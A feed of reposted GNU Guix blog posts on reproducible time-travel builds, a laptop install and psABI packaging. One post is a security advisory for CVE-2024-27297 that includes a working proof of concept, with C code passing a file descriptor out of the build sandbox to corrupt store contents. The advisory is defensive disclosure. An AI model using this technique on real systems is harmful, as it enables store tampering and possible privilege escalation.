#t

federatica_bot@federatica.space

GNU Guix: Adventures on the quest for long-term reproducible deployment

image

Rebuilding software five years later, how hard can it be? It can’t be that hard, especially when you pride yourself on having a tool that can travel in time and that does a good job at ensuring reproducible builds, right?

In hindsight, we can tell you: it’s more challenging than it seems. Users attempting to travel 5 years back with guix time-machine are (or were ) unavoidably going to hit bumps on the road—a real problem because that’s one of the use cases Guix aims to support well, in particular in a reproducible research context.

In this post, we look at some of the challenges we face while traveling back, how we are overcoming them, and open issues.

The vision

First of all, one clarification: Guix aims to support time travel, but we’re talking of a time scale measured in years, not in decades. We know all too well that this is already very ambitious—it’s something that probably nobody except Nix and Guix are even trying. More importantly, software deployment at the scale of decades calls for very different, more radical techniques; it’s the work of archivists.

Concretely, Guix 1.0.0 was released in 2019 and our goal is to allow users to travel as far back as 1.0.0 and redeploy software from there, as in this example:

$ guix time-machine -q --commit=v1.0.0 -- \
     environment --ad-hoc python2 -- python
> guile: warning: failed to install locale
Python 2.7.15 (default, Jan  1 1970, 00:00:01) 
[GCC 5.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>

(The command above uses guix environment, the predecessor of guix shell, which didn’t exist back then.) It’s only 5 years ago but it’s pretty much remote history on the scale of software evolution—in this case, that history comprises major changes in Guix itself and in Guile. How well does such a command work? Well, it depends.

The project has two build farms; bordeaux.guix.gnu.org has been keeping substitutes (pre-built binaries) of everything it built since roughly 2021, while ci.guix.gnu.org keeps substitutes for roughly two years, but there is currently no guarantee on the duration substitutes may be retained. Time traveling to a period where substitutes are available is fine: you end up downloading lots of binaries, but that’s OK, you rather quickly have your software environment at hand.

Bumps on the build road

Things get more complicated when targeting a period in time for which substitutes are no longer available, as was the case for v1.0.0 above. (And really, we should assume that substitutes won’t remain available forever: fellow NixOS hackers recently had to seriously consider trimming their 20-year-long history of substitutes because the costs are not sustainable.)

Apart from the long build times, the first problem that arises in the absence of substitutes is source code unavailability. I’ll spare you the details for this post—that problem alone would deserve a book. Suffice to say that we’re lucky that we started working on integrating Guix with Software Heritage years ago, and that there has been great progress over the last couple of years to get closer to full package source code archival (more precisely: 94% of the source code of packages available in Guix in January 2024 is archived, versus 72% of the packages available in May 2019).

So what happens when you run the time-machine command above? It brings you to May 2019, a time for which none of the official build farms had substitutes until a few days ago. Ideally, thanks to isolated build environments, you’d build things for hours or days, and in the end all those binaries will be here just as they were 5 years ago. In practice though, there are several problems that isolation as currently implemented does not address.

Screenshot of movie “Safety Last!” with Harold Lloyd hanging from a clock on a building’s façade.

Among those, the most frequent problem is time traps : software build processes that fail after a certain date (these are also referred to as “time bombs” but we’ve had enough of these and would rather call for a ceasefire). This plagues a handful of packages out of almost 30,000 but unfortunately we’re talking about packages deep in the dependency graph. Here are some examples:

  • OpenSSL unit tests fail after a certain date because some of the X.509 certificates they use have expired.
  • GnuTLS had similar issues; newer versions rely on datefudge to fake the date while running the tests and thus avoid that problem altogether.
  • Python 2.7, found in Guix 1.0.0, also had that problem with its TLS-related tests.
  • OpenJDK would fail to build at some point with this interesting message: Error: time is more than 10 years from present: 1388527200000 (the build system would consider that its data about currencies is likely outdated after 10 years).
  • Libgit2, a dependency of Guix, had (has?) a time-dependent tests.
  • MariaDB tests started failing in 2019.

Someone traveling to v1.0.0 will hit several of these, preventing guix time-machine from completing. A serious bummer, especially to those who’ve come to Guix from the perspective of making their research workflow reproducible.

Time traps are the main road block, but there’s more! In rare cases, there’s software influenced by kernel details not controlled by the build daemon:

In a handful of cases, but important ones, builds might fail when performed on certain CPUs. We’re aware of at least two cases:

Neither time traps nor those obscure hardware-related issues can be avoided with the isolation mechanism currently used by the build daemon. This harms time traveling when substitutes are unavailable. Giving up is not in the ethos of this project though.

Where to go from here?

There are really two open questions here:

  1. How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?
  2. How can keep those aspects of the build environment (time, CPU variant) under control?

Let’s start with #2. Before looking for a solution, it’s worth remembering where we come from. The build daemon runs build processes with a separate root file system, under dedicated user IDs, and in separate Linux namespaces, thereby minimizing interference with the rest of the system and ensuring a well-defined build environment. This technique was implemented by Eelco Dolstra for Nix in 2007 (with namespace support added in 2012), at a time where the word container had to do with boats and before “Docker” became the name of a software tool. In short, the approach consists in controlling the build environment in every detail (it’s at odds with the strategy that consists in achieving reproducible builds in spite of high build environment variability). That these are mere processes with a bunch of bind mounts makes this approach inexpensive and appealing.

Realizing we’d also want to control the build environment’s date, we naturally turn to Linux namespaces to address that—Dolstra, Löh, and Pierron already suggested something along these lines in the conclusion of their 2010 Journal of Functional Programming paper. Turns out there is now a time namespace. Unfortunately it’s limited to CLOCK_MONOTONIC and CLOCK_BOOTTIME clocks; the manual page states:

Note that time namespaces do not virtualize the CLOCK_REALTIME clock. Virtualization of this clock was avoided for reasons of complexity and overhead within the kernel.

I hear you say: What aboutdatefudge and libfaketime? These rely on the LD_PRELOAD environment variable to trick the dynamic linker into pre-loading a library that provides symbols such as gettimeofday and clock_gettime. This is a fine approach in some cases, but it’s too fragile and too intrusive when targeting arbitrary build processes.

That leaves us with essentially one viable option: virtual machines (VMs). The full-system QEMU lets you specify the initial real-time clock of the VM with the -rtc flag, which is exactly what we need (“user-land” QEMU such as qemu-x86_64 does not support it). And of course, it lets you specify the CPU model to emulate.

News from the past

Now, the question is: where does the VM fit? The author considered writing a package transformation that would change a package such that it’s built in a well-defined VM. However, that wouldn’t really help: this option didn’t exist in past revisions, and it would lead to a different build anyway from the perspective of the daemon—a different derivation.

The best strategy appeared to be offloading: the build daemon can offload builds to different machines over SSH, we just need to let it send builds to a suitably-configured VM. To do that, we can reuse some of the machinery initially developed for childhurds that takes care of setting up offloading to the VM: creating substitute signing keys and SSH keys, exchanging secret key material between the host and the guest, and so on.

The end result is a service for Guix System users that can be configured in a few lines:

(use-modules (gnu services virtualization))

(operating-system
  ;; …
  (services (append (list (service virtual-build-machine-service-type))
                    %base-services)))

The default setting above provides a 4-core VM whose initial date is January 2020, emulating a Skylake CPU from that time—the right setup for someone willing to reproduce old binaries. You can check the configuration like this:

$ sudo herd configuration build-vm
CPU: Skylake-Client
number of CPU cores: 4
memory size: 2048 MiB
initial date: Wed Jan 01 00:00:00Z 2020

To enable offloading to that VM, one has to explicitly start it, like so:

$ sudo herd start build-vm

From there on, every native build is offloaded to the VM. The key part is that with almost no configuration, you get everything set up to build packages “in the past”. It’s a Guix System only solution; if you run Guix on another distro, you can set up a similar build VM but you’ll have to go through the cumbersome process that is all taken care of automatically here.

Of course it’s possible to choose different configuration parameters:

(service virtual-build-machine-service-type
         (virtual-build-machine
          (date (make-date 0 0 00 00 01 10 2017 0)) ;further back in time
          (cpu "Westmere")
          (cpu-count 16)
          (memory-size (* 8 1024))
          (auto-start? #t)))

With a build VM with its date set to January 2020, we have been able to rebuild Guix and its dependencies along with a bunch of packages such as emacs-minimal from v1.0.0, overcoming all the time traps and other challenges described earlier. As a side effect, substitutes are now available from ci.guix.gnu.org so you can even try this at home without having to rebuild the world:

$ guix time-machine -q --commit=v1.0.0 -- build emacs-minimal --dry-run
guile: warning: failed to install locale
substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0%
38.5 MB would be downloaded:
   /gnu/store/53dnj0gmy5qxa4cbqpzq0fl2gcg55jpk-emacs-minimal-26.2

For the fun of it, we went as far as v0.16.0, released in December 2018:

guix time-machine -q --commit=v0.16.0 -- \
  environment --ad-hoc vim -- vim --version

This is the furthest we can go since channels and the underlying mechanisms that make time travel possible did not exist before that date.

There’s one “interesting” case we stumbled upon in that process: in OpenSSL 1.1.1g (released April 2020 and packaged in December 2020), some of the test certificates are not valid before April 2020, so the build VM needs to have its clock set to May 2020 or thereabouts. Booting the build VM with a different date can be done without reconfiguring the system:

$ sudo herd stop build-vm
$ sudo herd start build-vm -- -rtc base=2020-05-01T00:00:00

The -rtc … flags are passed straight to QEMU, which is handy when exploring workarounds…

The time-travel continuous integration jobset has been set up to check that we can, at any time, travel back to one of the past releases. This at least ensures that Guix itself and its dependencies have substitutes available at ci.guix.gnu.org.

Reproducible research workflows reproduced

Incidentally, this effort rebuilding 5-year-old packages has allowed us to fix embarrassing problems. Software that accompanies research papers that followed our reproducibility guidelines could no longer be deployed, at least not without this clock twiddling effort:

It’s good news that we can now re-deploy these 5-year-old software environments with minimum hassle; it’s bad news that holding this promise took extra effort.

The ability to reproduce the environment of software that accompanies research work should not be considered a mundanity or an exercise that’s “overkill”. The ability to rerun, inspect, and modify software are the natural extension of the scientific method. Without a companion reproducible software environment, research papers are merely the advertisement of scholarship , to paraphrase Jon Claerbout.

The future

The astute reader surely noticed that we didn’t answer question #1 above:

How can we tell which packages needs to be “fixed”, and how: building at a specific date, on a specific CPU?

It’s a fact that Guix so far lacks information about the date, kernel, or CPU model that should be used to build a given package. Derivations purposefully lack that information on the grounds that it cannot be enforced in user land and is rarely necessary—which is true, but “rarely” is not the same as “never”, as we saw. Should we create a catalog of date, CPU, and/or kernel annotations for packages found in past revisions? Should we define, for the long-term, an all-encompassing derivation format? If we did and effectively required virtual build machines, what would that mean from a bootstrapping standpoint?

Here’s another option: build packages in VMs running in the year 2100, say, and on a baseline CPU. We don’t need to require all users to set up a virtual build machine—that would be impractical. It may be enough to set up the project build farms so they build everything that way. This would allow us to catch time traps and year 2038 bugs before they bite.

Before we can do that, the virtual-build-machine service needs to be optimized. Right now, offloading to build VMs is as heavyweight as offloading to a separate physical build machine: data is transferred back and forth over SSH over TCP/IP. The first step will be to run SSH over a paravirtualized transport instead such as AF_VSOCK sockets. Another avenue would be to make /gnu/store in the guest VM an overlay over the host store so that inputs do not need to be transferred and copied.

Until then, happy software (re)deployment!

Acknowledgments

Thanks to Simon Tournier for insightful comments on a previous version of this post.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Fixed-Output Derivation Sandbox Bypass (CVE-2024-27297)

A security issue has been identified in guix-daemon which allows for fixed-output derivations, such as source code tarballs or Git checkouts, to be corrupted by an unprivileged user. This could also lead to local privilege escalation. This was originally reported to Nix but also affects Guix as we share some underlying code from an older version of Nix for the guix-daemon. Readers only interested in making sure their Guix is up to date and no longer affected by this vulnerability can skip down to the "Upgrading" section.

Vulnerability

The basic idea of the attack is to pass file descriptors through Unix sockets to allow another process to modify the derivation contents. This was first reported to Nix by jade and puckipedia with further details and a proof of concept here. Note that the proof of concept is written for Nix and has been adapted for GNU Guix below. This security advisory is registered as CVE-2024-27297 (details are also available at Nix's GitHub security advisory) and rated "moderate" in severity.

A fixed-output derivation is one where the output hash is known in advance. For instance, to produce a source tarball. The GNU Guix build sandbox purposefully excludes network access (for security and to ensure we can control and reproduce the build environment), but a fixed-output derivation does have network access, for instance to download that source tarball. However, as stated, the hash of output must be known in advance, again for security (we know if the file contents would change) and reproducibility (should always have the same output). The guix-daemon handles the build process and writing the output to the store, as a privileged process.

In the build sandbox for a fixed-output derivation, a file descriptor to its contents could be shared with another process via a Unix socket. This other process, outside of the build sandbox, can then modify the contents written to the store, changing them to something malicious or otherwise corrupting the output. While the output hash has already been determined, these changes would mean a fixed-output derivation could have contents written to the store which do not match the expected hash. This could then be used by the user or other packages as well.

Mitigation

This security issue (tracked here for GNU Guix) has been fixed by two commits by Ludovic Courtès. Users should make sure they have updated to this second commit to be protected from this vulnerability. Upgrade instructions are in the following section.

While several possible mitigation strategies were detailed in the original report, the simplest fix is just copy the derivation output somewhere else, deleting the original, before writing to the store. Any file descriptors will no longer point to the contents which get written to the store, so only the guix-daemon should be able to write to the store, as designed. This is what the Nix project used in their own fix. This does add an additional copy/delete for each file, which may add a performance penalty for derivations with many files.

A proof of concept by Ludovic, adapted from the one in the original Nix report, is available at the end of this post. One can run this code with

guix build -f fixed-output-derivation-corruption.scm -M4

This will output whether the current guix-daemon being used is vulnerable or not. If it is vulnerable, the output will include a line similar to

We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS VULNERABLE!

The corrupted file can be removed with

guix gc -D /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivation-that-exfiltrates-fd*

In general, corrupt files from the store can be found with

guix gc --verify=contents

which will also include any files corrupted by through this vulnerability. Do note that this command can take a long time to complete as it checks every file under /gnu/store, which likely has many files.

Upgrading

Due to the severity of this security advisory, we strongly recommend all users to upgrade their guix-daemon immediately.

For a Guix System the procedure is just reconfiguring the system after a guix pull, either restarting guix-daemon or rebooting. For example,

guix pull
sudo guix system reconfigure /run/current-system/configuration.scm
sudo herd restart guix-daemon

where /run/current-system/configuration.scm is the current system configuration but could, of course, be replaced by a system configuration file of a user's choice.

For Guix running as a package manager on other distributions, one needs to guix pull with sudo, as the guix-daemon runs as root, and restart the guix-daemon service. For example, on a system using systemd to manage services,

sudo --login guix pull
sudo systemctl restart guix-daemon.service

Note that for users with their distro's package of Guix (as opposed to having used the install script) you may need to take other steps or upgrade the Guix package as per other packages on your distro. Please consult the relevant documentation from your distro or contact the package maintainer for additional information or questions.

Conclusion

One of the key features and design principles of GNU Guix is to allow unprivileged package management through a secure and reproducible build environment. While every effort is made to protect the user and system from any malicious actors, it is always possible that there are flaws yet to be discovered, as has happened here. In this case, using the ingredients of how file descriptors and Unix sockets work even in the isolated build environment allowed for a security vulnerability with moderate impact.

Our thanks to jade and puckipedia for the original report, and Picnoir for bringing this to the attention of the GNU Guix security team. And a special thanks to Ludovic Courtès for a prompt fix and proof of concept.

Note that there are current efforts to rewrite the guix-daemon in Guile by Christopher Baines. For more information and the latest news on this front, please refer to the recent blog post and this message on the guix-devel mailing list.

Proof of Concept

Below is code to check if a guix-daemon is vulnerable to this exploit. Save this file as fixed-output-derivation-corruption.scm and run following the instructions above, in "Mitigation." Some further details and example output can be found on issue #69728

;; Checking for CVE-2024-27297.
;; Adapted from <https://hackmd.io/03UGerewRcy3db44JQoWvw>.

(use-modules (guix)
             (guix modules)
             (guix profiles)
             (gnu packages)
             (gnu packages gnupg)
             (gcrypt hash)
             ((rnrs bytevectors) #:select (string->utf8)))

(define (compiled-c-code name source)
  (define build-profile
    (profile (content (specifications->manifest '("gcc-toolchain")))))

  (define build
    (with-extensions (list guile-gcrypt)
     (with-imported-modules (source-module-closure '((guix build utils)
                                                     (guix profiles)))
       #~(begin
           (use-modules (guix build utils)
                        (guix profiles))
           (load-profile #+build-profile)
           (system* "gcc" "-Wall" "-g" "-O2" #+source "-o" #$output)))))

  (computed-file name build))

(define sender-source
  (plain-file "sender.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <fcntl.h>
      #include <errno.h>

      int main(int argc, char **argv) {
          setvbuf(stdout, NULL, _IOLBF, 0);

          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Set up an abstract domain socket path to connect to.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");

          // Now try to connect, To ensure we work no matter what order we are
          // executed in, just busyloop here.
          int res = -1;
          while (res < 0) {
              printf(\"attempting connection...\\n\");
              res = connect(sock, (const struct sockaddr *)&data,
                  offsetof(struct sockaddr_un, sun_path)
                    + strlen(\"dihutenosa\")
                    + 1);
              if (res < 0 && errno != ECONNREFUSED) perror(\"connect\");
              if (errno != ECONNREFUSED) break;
              usleep(500000);
          }

          // Write our message header.
          struct msghdr msg = {0};
          msg.msg_control = malloc(128);
          msg.msg_controllen = 128;

          // Write an SCM_RIGHTS message containing the output path.
          struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
          hdr->cmsg_len = CMSG_LEN(sizeof(int));
          hdr->cmsg_level = SOL_SOCKET;
          hdr->cmsg_type = SCM_RIGHTS;
          int fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640);
          memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));

          msg.msg_controllen = CMSG_SPACE(sizeof(int));

          // Write a single null byte too.
          msg.msg_iov = malloc(sizeof(struct iovec));
          msg.msg_iov[0].iov_base = \"\";
          msg.msg_iov[0].iov_len = 1;
          msg.msg_iovlen = 1;

          // Send it to the othher side of this connection.
          res = sendmsg(sock, &msg, 0);
          if (res < 0) perror(\"sendmsg\");
          int buf;

          // Wait for the server to close the socket, implying that it has
          // received the commmand.
          recv(sock, (void *)&buf, sizeof(int), 0);
      }"))

(define receiver-source
  (mixed-text-file "receiver.c" "
      #include <sys/socket.h>
      #include <sys/un.h>
      #include <stdlib.h>
      #include <stddef.h>
      #include <stdio.h>
      #include <unistd.h>
      #include <sys/inotify.h>

      int main(int argc, char **argv) {
          int sock = socket(AF_UNIX, SOCK_STREAM, 0);

          // Bind to the socket.
          struct sockaddr_un data;
          data.sun_family = AF_UNIX;
          data.sun_path[0] = 0;
          strcpy(data.sun_path + 1, \"dihutenosa\");
          int res = bind(sock, (const struct sockaddr *)&data,
              offsetof(struct sockaddr_un, sun_path)
              + strlen(\"dihutenosa\")
              + 1);
          if (res < 0) perror(\"bind\");

          res = listen(sock, 1);
          if (res < 0) perror(\"listen\");

          while (1) {
              setvbuf(stdout, NULL, _IOLBF, 0);
              printf(\"accepting connections...\\n\");
              int a = accept(sock, 0, 0);
              if (a < 0) perror(\"accept\");

              struct msghdr msg = {0};
              msg.msg_control = malloc(128);
              msg.msg_controllen = 128;

              // Receive the file descriptor as sent by the smuggler.
              recvmsg(a, &msg, 0);

              struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
              while (hdr) {
                  if (hdr->cmsg_level == SOL_SOCKET
                   && hdr->cmsg_type == SCM_RIGHTS) {
                      int res;

                      // Grab the copy of the file descriptor.
                      memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int));
                      printf(\"preparing our hand...\\n\");

                      ftruncate(res, 0);
                      // Write the expected contents to the file, tricking Nix
                      // into accepting it as matching the fixed-output hash.
                      write(res, \"hello, world\\n\", strlen(\"hello, world\\n\"));

                      // But wait, the file is bigger than this! What could
                      // this code hide?

                      // First, we do a bit of a hack to get a path for the
                      // file descriptor we received. This is necessary because
                      // that file doesn't exist in our mount namespace!
                      char buf[128];
                      sprintf(buf, \"/proc/self/fd/%d\", res);

                      // Hook up an inotify on that file, so whenever Nix
                      // closes the file, we get notified.
                      int inot = inotify_init();
                      inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE);

                      // Notify the smuggler that we've set everything up for
                      // the magic trick we're about to do.
                      close(a);

                      // So, before we continue with this code, a trip into Nix
                      // reveals a small flaw in fixed-output derivations. When
                      // storing their output, Nix has to hash them twice. Once
                      // to verify they match the \"flat\" hash of the derivation
                      // and once more after packing the file into the NAR that
                      // gets sent to a binary cache for others to consume. And
                      // there's a very slight window inbetween, where we could
                      // just swap the contents of our file. But the first hash
                      // is still noted down, and Nix will refuse to import our
                      // NAR file. To trick it, we need to write a reference to
                      // a store path that the source code for the smuggler drv
                      // references, to ensure it gets picked up. Continuing...

                      // Wait for the next inotify event to drop:
                      read(inot, buf, 128);

                      // first read + CA check has just been done, Nix is about
                      // to chown the file to root. afterwards, refscanning
                      // happens...

                      // Empty the file, seek to start.
                      ftruncate(res, 0);
                      lseek(res, 0, SEEK_SET);

                      // We swap out the contents!
                      static const char content[] = \"This file has been corrupted!\\n\";
                      write(res, content, strlen (content));
                      close(res);

                      printf(\"swaptrick finished, now to wait..\\n\");
                      return 0;
                  }

                  hdr = CMSG_NXTHDR(&msg, hdr);
              }
              close(a);
          }
      }"))

(define nonce
  (string-append "-" (number->string (car (gettimeofday)) 16)
                 "-" (number->string (getpid))))

(define original-text
  "This is the original text, before corruption.")

(define derivation-that-exfiltrates-fd
  (computed-file (string-append "derivation-that-exfiltrates-fd" nonce)
                 (with-imported-modules '((guix build utils))
                   #~(begin
                       (use-modules (guix build utils))
                       (invoke #+(compiled-c-code "sender" sender-source))
                       (call-with-output-file #$output
                         (lambda (port)
                           (display #$original-text port)))))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256
                                      (string->utf8 original-text)))))

(define derivation-that-grabs-fd
  (computed-file (string-append "derivation-that-grabs-fd" nonce)
                 #~(begin
                     (open-output-file #$output) ;make sure there's an output
                     (execl #+(compiled-c-code "receiver" receiver-source)
                            "receiver"))
                 #:options `(#:hash-algo sha256
                             #:hash ,(sha256 #vu8()))))

(define check
  (computed-file "checking-for-vulnerability"
                 #~(begin
                     (use-modules (ice-9 textual-ports))

                     (mkdir #$output)            ;make sure there's an output
                     (format #t "This depends on ~a, which will grab the file
descriptor and corrupt ~a.~%~%"
                             #+derivation-that-grabs-fd
                             #+derivation-that-exfiltrates-fd)

                     (let ((content (call-with-input-file
                                        #+derivation-that-exfiltrates-fd
                                      get-string-all)))
                       (format #t "Here is what we see in ~a: ~s~%~%"
                               #+derivation-that-exfiltrates-fd content)
                       (if (string=? content #$original-text)
                           (format #t "Failed to corrupt ~a, \
your system is safe.~%"
                                   #+derivation-that-exfiltrates-fd)
                           (begin
                             (format #t "We managed to corrupt ~a, \
meaning that YOUR SYSTEM IS VULNERABLE!~%"
                                     #+derivation-that-exfiltrates-fd)
                             (exit 1)))))))

check

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

#gnu #gnuorg #opensource

federatica_bot@federatica.space

Andy Wingo: guix on the framework 13 amd

I got a new laptop! It’s a Framework 13 AMD: 8 cores, 2 threads per core, 64 GB RAM, 3:2 2256×1504 matte screen. It kicks my 5-year-old Dell XPS 13 in the pants, and I am so relieved to be back to a matte screen. I just got it up and running with Guix, which though easier than past installation experiences was not without some wrinkles, so here I wanted to share a recipe for what worked for me.

(I swear this isn’t going to become a product review blog, but when I went to post something like this on the Framework forum I got an error saying that new users could only post 2 links. I understand how we got here but hoo, that is a garbage experience!)

The basic deal

Upstream Guix works on the Framework 13 AMD, but only with software rendering and no wifi, and I wasn’t able to install from upstream media. This is mainly because Guix uses a modified kernel and doesn’t include necessary firmware. There is a third-party nonguix repository that defines packages for the vanilla Linux kernel and the linux-firmware collection; we have to use that repo if we want all functionality.

Of course having the firmware be user-hackable would be better, and it would be better if the framework laptop used parts with free firmware. Something for a next revision, hopefully.

On firmware

As an aside, I think the official Free Software Foundation position on firmware is bad praxis. To recall, the idea is that if a device has embedded software (firmware) that can be updated, but that software is in a form that users can’t modify, then the system as a whole is not free software. This is technically correct but doesn’t logically imply that that the right strategy for advancing free software is to forbid firmware blobs; you have a number of potential policy choices and you have to look at their expected results to evaluate which one is most in line with your goals.

Bright lines are useful, of course; I just think that with respect to free software, drawing that line around firmware is not interesting. To illustrate this point, I believe the current FSF position is that if you can run e.g. a USB ethernet adapter without installing non-free firmware, then it is kosher, otherwise it is haram. However many of these devices have firmware; it’s just that you aren’t updating it. So for example the the USB Ethernet adapter I got with my Dell system many years ago has firmware, therefore it has bugs, but I have never updated that firmware because that’s not how we roll. Or, on my old laptop, I never updated the CPU microcode, despite spectre and meltdown and all the rest.

“Firmware, but never updated” reminds me of the wires around some New York neighborhoods that allow orthodox people to leave the house on Sabbath; useful if you are of a given community and enjoy the feeling of belonging, but I think even the faithful would see it as a hack. It is like how Richard Stallman wouldn’t use travel booking web sites because they had non-free JavaScript, but would happily call someone on the telephone to perform the booking for him, using those same sites. In that case, the net effect on the world of this particular bright line is negative: it does not advance free software in the least and only adds overhead. Privileging principle over praxis is generally a losing strategy.

Installation

Firstly I had to turn off secure boot in the bios settings; it’s in “security”.

I wasn’t expecting wifi to work out of the box, but for some reason the upstream Guix install media was not able to configure the network via the Ethernet expansion card nor an external USB-C ethernet adapter that I had; stuck at the DHCP phase. So my initial installation attempt failed.

Then I realized that the nonguix repository has installation media, which is the same as upstream but with the vanilla kernel and linux-firmware. So on another machine where I had Guix installed, I added the nonguix channel and built the installation media, via guix system image -t iso9660 nongnu/system/install.scm. That gave me a file that I could write to a USB stick.

Using that installation media, installing was a breeze.

However upon reboot, I found that I had no wifi and I was using software rendering; clearly, installation produced an OS config with the Guix kernel instead of upstream Linux. Happily, at this point the ethernet expansion card was able to work, so connect to wired ethernet, open /etc/config.scm, add the needed lines as described in the operating-system part of the nonguix README, reconfigure, and reboot. Building Linux takes a little less than an hour on this machine.

Fractional scaling

At that point you have wifi and graphics drivers. I use GNOME, and things seem to work. However the screen defaults to 200% resolution, which makes everything really big. Crisp, pretty, but big. Really you would like something in between? Or that the Framework ships a higher-resolution screen so that 200% would be a good scaling factor; this was the case with my old Dell XPS 13, and it worked well. Anyway with the Framework laptop, I wanted 150% scaling, and it seems these days that the way you have to do this is to use Wayland, which Guix does not yet enable by default.

So you go into config.scm again, and change where it says %desktop-services to be:

(modify-services %desktop-services
  (gdm-service-type config =>
    (gdm-configuration (inherit config) (wayland? #t))))

Then when you reboot you are in Wayland. Works fine, it seems. But then you have to go and enable an experimental mutter setting; install dconf-editor, run it, search for keys with “mutter” in the name, find the “experimental settings” key, tell it to not use the default setting, then click the box for “scale-monitor-framebuffer”.

Then! You can go into GNOME settings and get 125%, 150%, and so on. Great.

HOWEVER, and I hope this is a transient situation, there is a problem: in GNOME, applications that aren’t native Wayland apps don’t scale nicely. It’s like the app gets rendered to a texture at the original resolution, which then gets scaled up in a blurry way. There aren’t so many of these apps these days as most things have been ported to be Wayland-capable, Firefox included, but Emacs is one of them :( However however! If you install the emacs-pgtk package instead of emacs, it looks better. Not perfect, but good enough. So that’s where I am.

Bugs

The laptop hangs on reboot due to this bug, but that seems a minor issue at this point. There is an ongoing tracker discussion on the community forum; like other problems in that thread, I hope that this one resolves itself upstream in Linux over time.

Other things?

I didn’t mention the funniest thing about this laptop: it comes in pieces that you have to put together :) I am not so great with hardware, but I had no problem. The build quality seems pretty good; not a MacBook Air, but then it’s also user-repairable, which is a big strong point. It has these funny extension cards that slot into the chassis, which I have found to be quite amusing.

I haven’t had the machine for long enough but it seems to work fine up to now: suspend, good battery use, not noisy (unless it’s compiling on all 16 threads), graphics, wifi, ethernet, good compilation speed. (I should give compiling LLVM a go; that’s a useful workload.) I don’t have bluetooth or the fingerprint reader working yet; I give it 25% odds that I get around to this during the lifetime of this laptop :)

Until next time, happy hacking!

#gnu #gnuorg #opensource

federatica_bot@federatica.space

GNU Guix: Building packages targeting psABIs

Starting with version 2.33, the GNU C library (glibc) grew the capability to search for shared libraries using additional paths, based on the hardware capabilities of the machine running the code. This was a great boon for x86_64, which was first released in 2003, and has seen many changes in the capabilities of the hardware since then. While it is extremely common for Linux distributions to compile for a baseline which encompasses all of an architecture, there is performance being left on the table by targeting such an old specification and not one of the newer revisions.

One option used internally in glibc and in some other performance-critical libraries is indirect functions, or IFUNCs (see also here) The loader, ld.so uses them to pick function implementations optimized for the available CPU at load time. GCC's (functional multi-versioning (FMV))[https://gcc.gnu.org/wiki/FunctionMultiVersioning] generates several optimized versions of functions, using the IFUNC mechanism so the approprate one is selected at load time. These are strategies which most performance-sensitive libraries do, but not all of them.

With the --tune using package transformation option, Guix implements so-called package multi-versioning, which creates package variants using compiler flags set to use optimizations targeted for a specific CPU.

Finally - and we're getting to the central topic of this post! - glibc since version 2.33 supports another approach: ld.so would search not just the /lib folder, but also the glibc-hwcaps folders, which for x86_64 included /lib/glibc-hwcaps/x86-64-v2, /lib/glibc-hwcaps/x86-64-v3 and /lib/glibc-hwcaps/x86-64-v4, corresponding to the psABI micro-architectures of the x86_64 architecture. This means that if a library was compiled against the baseline of the architecture then it should be installed in /lib, but if it were compiled a second time, this time using (depending on the build instructions) -march=x86-64-v2, then the libraries could be installed in /lib/glibc-hwcaps/x86-64-v2 and then glibc, using ld.so, would choose the correct library at runtime.

These micro-architectures aren't a perfect match for the different hardware available, it is often the case that a particular CPU would satisfy the requirements of one tier and part of the next but would therefore only be able to use the optimizations provided by the first tier and not by the added features that the CPU also supports.

This of course shouldn't be a problem in Guix; it's possible, and even encouraged, to adjust packages to be more useful for one's needs. The problem comes from the search paths: ld.so will only search for the glibc-hwcaps directory if it has already found the base library in the preceding /lib directory. This isn't a problem for distributions following the File System Hierarchy (FHS), but for Guix we will need to ensure that all the different versions of the library will be in the same output.

With a little bit of planning this turns out to not be as hard as it sounds. Lets take for example, the GNU Scientific Library, gsl, a math library which helps with all sorts of numerical analysis. First we create a procedure to generate our 3 additional packages, corresponding to the psABIs that are searched for in the glibc-hwcaps directory.

(define (gsl-hwabi psabi)
  (package/inherit gsl
    (name (string-append "gsl-" psabi))
    (arguments
     (substitute-keyword-arguments (package-arguments gsl)
       ((#:make-flags flags #~'())
        #~(append (list (string-append "CFLAGS=-march=" #$psabi)
                        (string-append "CXXFLAGS=-march=" #$psabi))
                  #$flags))
       ((#:configure-flags flags #~'())
        #~(append (list (string-append "--libdir=" #$output
                                       "/lib/glibc-hwcaps/" #$psabi))
                  #$flags))
       ;; The building machine can't necessarily run the code produced.
       ((#:tests? _ #t) #f)
       ((#:phases phases #~%standard-phases)
        #~(modify-phases #$phases
            (add-after 'install 'remove-extra-files
              (lambda _
                (for-each (lambda (dir)
                            (delete-file-recursively (string-append #$output dir)))
                          (list (string-append "/lib/glibc-hwcaps/" #$psabi "/pkgconfig")
                                "/bin" "/include" "/share"))))))))
    (supported-systems '("x86_64-linux" "powerpc64le-linux"))
    (properties `((hidden? . #t)
                  (tunable? . #f)))))

